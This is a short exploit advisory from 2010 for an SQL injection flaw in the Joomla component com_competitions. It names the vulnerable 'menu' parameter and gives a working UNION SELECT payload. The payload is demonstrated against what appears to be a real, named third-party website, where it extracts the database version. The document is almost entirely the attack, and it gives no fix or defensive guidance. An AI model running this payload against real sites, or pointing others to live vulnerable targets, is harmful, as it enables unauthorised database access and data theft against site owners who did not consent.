=======================================================================
Joomla Component (com_competitions) SQL Injection
=======================================================================
# Joomla Component (com_competitions) SQL Injection
# Date: 29/11/2010
# Author: s4r4d0
# Contact: s4r4d0[at]yahoo[dot]com
# Team: Fatal Error
# Greetz: Ashiyane Members !
# Made in Brazil
==========================================================================
==========================================================================
[+] vuln:
http://www.site.com/index.php?option=com_competitions&menu=[Sql injection]
[+] live:
http://www.windsurfonline.fr/index.php?option=com_competitions&menu=90 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,@@version,17,18,19,20,21,22,23,24,25--
